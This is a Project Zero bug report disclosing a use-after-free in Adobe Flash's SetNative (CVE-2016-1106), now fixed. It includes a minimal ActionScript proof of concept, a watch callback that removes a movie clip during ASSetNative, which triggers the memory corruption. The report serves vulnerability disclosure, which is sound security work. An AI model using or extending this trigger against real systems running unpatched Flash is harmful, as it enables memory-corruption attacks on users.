800 - Adobe Flash: Use-after-free in SetNative - project-zero

Starred by 3 users

Status:	Fixed
Owner:	natashenka@google.com
Closed:	May 2016
Cc:	project-...@google.com
Finder-natashenka Deadline-90 CCProjectZeroMembers Product-Flash Severity-High Vendor-Adobe Reported-2016-Apr-11 CVE-2016-1106

Adobe Flash: Use-after-free in SetNative

Project Member Reported by natashenka@google.com, Apr 12 2016

Back to list

There is a use-after-free in SetNative. If a watch is placed on a native that is initialized by SetNative, it can delete the object the set is being called on, leading to a use-after-free. A minimal PoC follows:

var t = this.createEmptyMovieClip("t", 1);
t.watch("a", func);
ASSetNative(t, 106, "a,b");
			
			
function func (){
	
	t.removeMovieClip();
	
	}

A swf and fla are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

setnative.swf
665 bytes Download

setnative.fla
4.6 KB Download

Project Member Comment 1 by natashenka@google.com, May 16 2016

Labels: -Restrict-View-Commit CVE-2016-1106
Status: Fixed

► Sign in to add a comment